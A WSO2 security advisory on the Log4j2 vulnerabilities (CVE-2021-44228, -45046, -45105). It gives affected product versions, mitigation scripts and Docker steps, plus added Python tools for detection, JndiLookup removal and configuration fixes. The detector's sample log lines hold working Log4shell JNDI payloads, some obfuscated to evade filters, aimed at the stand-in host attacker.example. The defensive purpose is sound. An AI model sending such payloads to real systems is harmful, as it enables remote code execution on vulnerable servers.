Log4j2 zero-day vulnerability (CVE-2021-44228 / CVE-2021-45046 / CVE-2021-45105)

Version: 4.0

Published: December 13, 2021

Last Updated: January 26, 2022

WSO2 impacted: Yes

Evidence of compromise: No

Customer actions required: Yes


Reported Incident

On December 10, 2021, the WSO2 Security and Compliance team received notifications of zero-day exploitation of a component used in multiple WSO2 products and services. Upon notification, the Security and Compliance team, together with the Engineering and Infrastructure teams, performed a detailed analysis of the WSO2 environment and of the affected products, and identified mitigation steps. WSO2 Engineering teams tested and confirmed the mitigation steps against the affected products and verified that all product functionality continues to work as intended.

Impact on WSO2 Products and Deployments

This announcement is applicable only for the following product versions:

  • WSO2 Identity Server 5.9.0 and above
  • WSO2 Identity Server Analytics 5.7.0 and above
  • WSO2 Identity Server as Key Manager 5.9.0 and above
  • WSO2 API Manager 3.0.0 and above
  • WSO2 API Manager Analytics 2.6.0 and above
  • WSO2 Enterprise Integrator 6.1.0 and above
  • WSO2 Enterprise Integrator Analytics 6.6.0 and above 
  • WSO2 Micro Integrator 1.1.0 and above 
  • WSO2 Micro Integrator Dashboard 4.0.0 and above 
  • WSO2 Micro Integrator Monitoring Dashboard 1.1.0 and above 
  • WSO2 Stream Processor 4.0.0 and above 
  • WSO2 Stream Integrator 1.0.0 and above 
  • WSO2 Stream Integrator Tooling 1.0.0 and above 
  • WSO2 Open Banking AM 2.0.0 and above
  • WSO2 Open Banking KM 2.0.0 and above
  • WSO2 Open Banking BI 1.3.0 and above
  • WSO2 Micro Gateway 3.2.0 and above

If you are using a product not listed above, or a version older than those listed, our current analysis indicates that your deployment is not affected by the vulnerabilities described in CVE-2021-44228[1], CVE-2021-45046[3], and CVE-2021-45105[4]. In such deployments, no further remediation is required.

Support Customers

If you are a WSO2 support customer, please follow the security announcements WSO2 published on December 11, 12, 13, 15, 16, and 19, 2021 through the WSO2 support portal immediately. If you need further information or assistance, please contact the WSO2 support team.

If you are not a WSO2 support customer but are affected by this security incident, please contact us through the Contact Us form for further assistance.

As described in CVE-2021-44228[1] and the associated Apache Log4j2 security advisory[2], Apache Log4j2 versions 2.0-beta9 through 2.14.1 (all releases before 2.15.0) are vulnerable to remote code execution; the fix shipped in 2.15.0 was later found to be incomplete (see CVE-2021-45046 below). The relevant advisory content published by the Apache Log4j2 team is as follows:

Description from CVE-2021-44228

Apache Log4j2 <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

As described in CVE-2021-45046[3] and the associated Apache Log4j2 security advisory[2], Apache Log4j2 versions up to and including 2.15.0 remain vulnerable to remote code execution in certain non-default configurations; this is fixed in 2.16.0. The relevant advisory content published by the Apache Log4j2 team is as follows:

Description from CVE-2021-45046

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments; remote code execution has been demonstrated on macOS but no other tested environments.
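Both descriptions above come down to one condition: attacker-controlled text reaches a Log4j 2 logger (directly as a message or parameter, or via the Thread Context Map) and contains a lookup such as ${jndi:ldap://...}. The Python below is an added example written for this page, not part of the WSO2 announcement or its tooling, showing how to spot such strings in request logs. It goes beyond the advisory text by also unwrapping the obfuscated forms built from Log4j's own lookup syntax (${lower:j}, ${upper:n}, ${::-j} and other default-value tricks) and by URL-decoding once. The access-log lines are constructed, and attacker.example is a reserved documentation domain.

```python
"""Spot Log4j 2 lookup strings (${jndi:...}) in attacker-controlled text such as
request headers or access-log lines, including common obfuscated forms."""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no nested '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Final signature once the obfuscation has been peeled away.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_passes: int = 10) -> str:
    """Collapse the trivial lookups used to disguise the word 'jndi':
    ${lower:X} -> x, ${upper:X} -> X, ${anything:-X} -> X (default value).
    Lookups that are not one of those (e.g. ${jndi:...}, ${date:...}) are left
    untouched. A single URL-decoding pass runs first so %24%7Bjndi... is seen;
    double-encoded input would need further passes."""
    text = unquote(text)
    for _ in range(max_passes):
        changed = False

        def peel(m):
            nonlocal changed
            body = m.group(1)
            if ":-" in body:                      # ${env:NOPE:-j}, ${::-j}
                changed = True
                return body.split(":-", 1)[1]
            lowered = body.lower()
            if lowered.startswith("lower:"):
                changed = True
                return body[len("lower:"):].lower()
            if lowered.startswith("upper:"):
                changed = True
                return body[len("upper:"):].upper()
            return m.group(0)

        text = INNER_LOOKUP.sub(peel, text)
        if not changed:                           # nothing left to unwrap
            break
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the text, after de-obfuscation, contains a ${jndi:...} lookup."""
    return JNDI_LOOKUP.search(normalize_lookups(text)) is not None


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalized line) for each suspicious line."""
    return [(n, normalize_lookups(line))
            for n, line in enumerate(lines, start=1) if is_jndi_lookup(line)]


# Constructed sample access-log lines (not real traffic). Line 1 and line 6 are
# benign; lines 2-5 carry a JNDI lookup in plain, nested, URL-encoded and
# default-value-obfuscated form respectively.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [10/Dec/2021:22:14:07 +0000] "GET /api/health HTTP/1.1" 200 15 "-" "curl/7.68.0"',
    '203.0.113.9 - - [10/Dec/2021:22:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:22:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:ldap}://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:22:14:15 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:22:14:18 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '198.51.100.7 - - [10/Dec/2021:22:14:20 +0000] "GET /docs?price=${amount} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line_no, normalized in find_jndi_lookups(SAMPLE_ACCESS_LOG):
        print(f"line {line_no}: {normalized}")
```

A hit only proves that a lookup string arrived, not that it was logged by a vulnerable Log4j2 or that the LDAP/RMI connection succeeded; correlate with outbound connections from the product host to the named endpoint.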

As described in CVE-2021-45105[4] and the associated Apache Log4j2 security advisory[2], Apache Log4j2 versions up to and including 2.16.0 are vulnerable to a denial of service; this is fixed in 2.17.0. The relevant advisory content published by the Apache Log4j2 team is as follows:

Description from CVE-2021-45105

Apache Log4j2 versions 2.0-alpha1 through 2.16.0, excluding 2.12.3, did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack.

WSO2 Engineering teams have already updated the Log4j 2 version to 2.17.0 and are currently working on updating it to 2.17.1. WSO2 values its customers and community users alike. Since this vulnerability is being widely exploited, we urge community users also to follow the mitigation steps to safeguard their deployments.

We recommend applying the temporary mitigation below as early as possible. Please note that the temporary mitigation script shared below is currently specific to Linux environments.

Temporary mitigation steps for CVE-2021-44228[1] and CVE-2021-45046[3]

  1. Ensure that the zip and unzip commands are installed on the server hosting the product.
  2. Run the mitigation script from the product-home folder using one of the following options (Option 2 lets you review the script before executing it):

    Option 1: Navigate to the product-home folder and run the following command:

        curl https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/CVE-2021-44228-mitigation.sh | bash

    Option 2:
      a. Download the script from https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/CVE-2021-44228-mitigation.sh
      b. Copy the script into the product-home folder.
      c. Run the script from the product-home folder with the following command: bash CVE-2021-44228-mitigation.sh
  3. After the script has run, restart the product.

The temporary mitigation script removes org/apache/logging/log4j/core/lookup/JndiLookup.class from every affected Log4j2 dependency found in the folder where the script is executed and in its sub-folders. This approach is also recommended on the Log4j2 security page[2]. To confirm the mitigation, list the contents of the affected jars with unzip and check that the JndiLookup class is no longer present. After applying the temporary fix, a ClassNotFoundException for the JndiLookup class may be logged during product startup; it can be safely ignored.
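What the mitigation script does can be reproduced portably and checked before and after. The Python program below is an added example written for this page; it is not the WSO2 script and downloads nothing. It walks a product-home, inspects every jar, war or zip for Log4j 2 core classes rather than trusting file names (Log4j 2 classes may be repackaged inside bundles that are not called log4j-core), reports the log4j-core version when the Maven metadata is present, and rewrites any archive that still carries JndiLookup.class without that entry. run_demo() builds a throwaway layout with constructed fake jars to show the before/after; the directory names under it mirror a typical product layout but are assumptions, and the fake jars contain placeholder bytes rather than real classes.

```python
"""Find archives that still carry Log4j 2's JndiLookup.class under a directory
and strip that entry, using only the Python standard library."""
import tempfile
import zipfile
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Optional

# The class removed by the temporary mitigation.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped in log4j-core; absent when the classes are repackaged,
# so the reported version is best-effort only.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = {".jar", ".war", ".zip"}


@dataclass
class Finding:
    path: Path
    version: Optional[str]      # None when no log4j-core pom.properties is bundled
    has_jndi_lookup: bool


def log4j_core_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Read the version= line from log4j-core's pom.properties, if present."""
    if POM_PROPS not in zf.namelist():
        return None
    for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan(root: Path) -> List[Finding]:
    """Inspect every archive under root and report those containing Log4j 2 core."""
    findings: List[Finding] = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in ARCHIVE_SUFFIXES:
            continue
        try:
            with zipfile.ZipFile(path) as zf:
                names = set(zf.namelist())
                version = log4j_core_version(zf)
        except zipfile.BadZipFile:
            continue                              # not really a zip archive
        if any(n.startswith("org/apache/logging/log4j/core/") for n in names):
            findings.append(Finding(path, version, JNDI_CLASS in names))
    return findings


def strip_jndi_lookup(jar: Path) -> bool:
    """Rewrite the archive without JndiLookup.class. True if it was removed."""
    tmp = jar.with_name(jar.name + ".tmp")
    with zipfile.ZipFile(jar) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_CLASS:
                    dst.writestr(info, src.read(info.filename))  # keeps per-entry compression
    tmp.replace(jar)                              # atomic swap once both handles are closed
    return True


def mitigate(root: Path) -> List[Path]:
    """Apply the temporary mitigation under root; return the archives modified."""
    return [f.path for f in scan(root) if f.has_jndi_lookup and strip_jndi_lookup(f.path)]


def _make_sample_jar(path: Path, version: str, with_jndi: bool) -> None:
    """Constructed fixture: a fake log4j-core jar with placeholder class bytes."""
    path.parent.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def run_demo() -> Dict[str, object]:
    """Build a throwaway product-home (assumed layout), scan, mitigate, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp)
        _make_sample_jar(home / "repository/components/plugins/log4j-core-2.14.1.jar", "2.14.1", True)
        _make_sample_jar(home / "lib/log4j-core-2.17.1.jar", "2.17.1", False)  # already stripped
        (home / "lib/not-a-jar.jar").write_bytes(b"garbage")                     # must be skipped
        before = {f.path.name: (f.version, f.has_jndi_lookup) for f in scan(home)}
        modified = [p.name for p in mitigate(home)]
        after = {f.path.name: (f.version, f.has_jndi_lookup) for f in scan(home)}
        with zipfile.ZipFile(home / "repository/components/plugins/log4j-core-2.14.1.jar") as zf:
            remaining = sorted(zf.namelist())     # other entries must survive the rewrite
        return {"before": before, "modified": modified, "after": after, "remaining": remaining}


if __name__ == "__main__":
    import json
    print(json.dumps(run_demo(), indent=2, default=str))
```

Run scan() on a real product-home first and review the findings before calling mitigate(); as with the WSO2 script, restart the product afterwards so the running JVM picks up the rewritten jars.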

If you use Docker images in your deployment, we advise temporarily building a new image that runs the provided script as an additional build step.

Example Dockerfile for Ubuntu-based images:

FROM wso2/wso2is:5.10.0

USER root

# The mitigation script needs both zip and unzip (see step 1 above).
RUN \
    apt-get update \
    && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        zip unzip \
    && rm -rf /var/lib/apt/lists/*

USER wso2carbon

# Download first, then execute, so a failed download fails the build instead of
# silently producing an unmitigated image (with "curl | bash" the RUN step would
# return bash's exit code, not curl's). Assumes the image's WORKDIR is the product-home.
RUN curl -fsSL -o CVE-2021-44228-mitigation.sh \
        https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/CVE-2021-44228-mitigation.sh \
    && bash CVE-2021-44228-mitigation.sh \
    && rm CVE-2021-44228-mitigation.sh

Identifying and applying temporary mitigations for CVE-2021-45105[4]

WSO2 has analyzed CVE-2021-45105 and the associated Log4j update (2.17.0). The default configurations of WSO2 products are not vulnerable to CVE-2021-45105. We strongly recommend running the command below from the WSO2 product-home to confirm that any customized configuration you use is not vulnerable either.

Linux (bash), from the product-home:

    grep -R '${ctx:' . | grep 'log4j'

Windows (PowerShell), from the product-home:

    Get-ChildItem -recurse | Select-String -ErrorAction SilentlyContinue -pattern '\${ctx:' | group path | select name | Select-String 'log4j'

If the command returns no results, your deployment is not affected. If any matches are found, remove the Context Lookups from the identified configuration file as recommended in the CVE-2021-45105 section of the Log4j security advisory[2].
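The grep only tells you whether a Context Lookup is present. The Apache advisory's recommended fix for CVE-2021-45105 is to replace lookups such as ${ctx:loginId} or $${ctx:loginId} in a PatternLayout with the Thread Context Map pattern %X{loginId}, which reads the MDC without going through lookup substitution. The Python below is an added example written for this page (not WSO2 tooling) that finds such lookups in log4j2.properties text and performs that rewrite, leaving lookups that carry a default value (${ctx:key:-default}) for manual review because %X has no default-value syntax. SAMPLE_CONFIG is a constructed fragment in log4j2.properties style; it is not WSO2's shipped configuration.

```python
"""Find Log4j 2 Context Lookups (${ctx:...}) in configuration text and rewrite
the simple ones to the equivalent Thread Context Map pattern (%X{key})."""
import re
from typing import List, Tuple

# ${ctx:key} or $${ctx:key}; an optional ":-default" suffix is captured separately.
CTX_LOOKUP = re.compile(r"\$\$?\{ctx:(?P<key>[^}:]+)(?P<default>:-[^}]*)?\}")


def find_context_lookups(config_text: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, matched lookup) for every Context Lookup."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(config_text.splitlines(), start=1):
        hits.extend((n, m.group(0)) for m in CTX_LOOKUP.finditer(line))
    return hits


def rewrite_context_lookups(config_text: str) -> Tuple[str, List[str]]:
    """Replace ${ctx:key} / $${ctx:key} with %X{key}.

    Lookups that carry a default value are left in place and returned for
    manual review, because %X{key} has no default-value syntax."""
    unresolved: List[str] = []

    def repl(m):
        if m.group("default"):
            unresolved.append(m.group(0))
            return m.group(0)
        return "%X{" + m.group("key") + "}"

    return CTX_LOOKUP.sub(repl, config_text), unresolved


# Constructed sample in log4j2.properties style (not WSO2's shipped configuration):
# the first appender is clean, the second uses Context Lookups in its pattern.
SAMPLE_CONFIG = """\
appender.CARBON_LOGFILE.type = RollingFile
appender.CARBON_LOGFILE.name = CARBON_LOGFILE
appender.CARBON_LOGFILE.layout.type = PatternLayout
appender.CARBON_LOGFILE.layout.pattern = [%d] %5p {%c} - %m%ex%n

appender.AUDIT_LOGFILE.type = RollingFile
appender.AUDIT_LOGFILE.name = AUDIT_LOGFILE
appender.AUDIT_LOGFILE.layout.type = PatternLayout
appender.AUDIT_LOGFILE.layout.pattern = [%d] user=$${ctx:loginId} ip=${ctx:clientIp:-unknown} %5p {%c} - %m%ex%n
"""

if __name__ == "__main__":
    for line_no, lookup in find_context_lookups(SAMPLE_CONFIG):
        print(f"line {line_no}: {lookup}")
    fixed, todo = rewrite_context_lookups(SAMPLE_CONFIG)
    print(fixed)
    print("needs manual review:", todo)
```

Apply the rewrite to a copy of the configuration, diff it against the original, and restart the product so the new layout takes effect; re-run the grep afterwards to confirm nothing was missed.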

If you are interested in CVE-2021-4104, please see [5].

We will update this announcement if further actions are required.

References